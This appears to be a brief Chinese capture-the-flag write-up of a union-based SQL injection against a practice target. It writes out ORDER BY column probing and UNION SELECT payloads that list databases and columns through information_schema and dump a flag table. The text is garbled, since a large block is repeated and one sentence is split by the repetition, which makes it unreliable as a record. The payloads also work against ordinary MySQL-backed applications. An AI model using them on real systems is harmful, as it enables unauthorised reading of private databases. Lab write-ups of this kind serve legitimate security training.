既然是靶场,那么验证是否存在sql注入的步骤直接省略
直接order by 查询字段数
3报错
2正常有两个字段
先查询以下数据库基本信息 version() user() database()
当前数据库名sqli
获取所有数据库名
' union select 1,group_concat(schema_name) from information_schema.schemata #
information_schema,mysql,performance_schema,sqli
Sqli数据库下
既然是靶场,那么验证是否存在sql注入的步骤直接省略
直接order by 查询字段数
3报错
2正常有两个字段
先查询以下数据库基本信息 version() user() database()
当前数据库名sqli
获取所有数据库名
' union select 1,group_concat(schema_name) from information_schema.schemata #
information_schema,mysql,performance_schema,sqli
Sqli数据库下有两个表
不用看了肯定是flag表
' union select 1,group_concat(column_name) from information_schema.columns where table_name='flag' #
1' and 1=2 union select 1,group_concat(flag) from sqli.flag#
有两个表
不用看了肯定是flag表
' union select 1,group_concat(column_name) from information_schema.columns where table_name='flag' #
1' and 1=2 union select 1,group_concat(flag) from sqli.flag#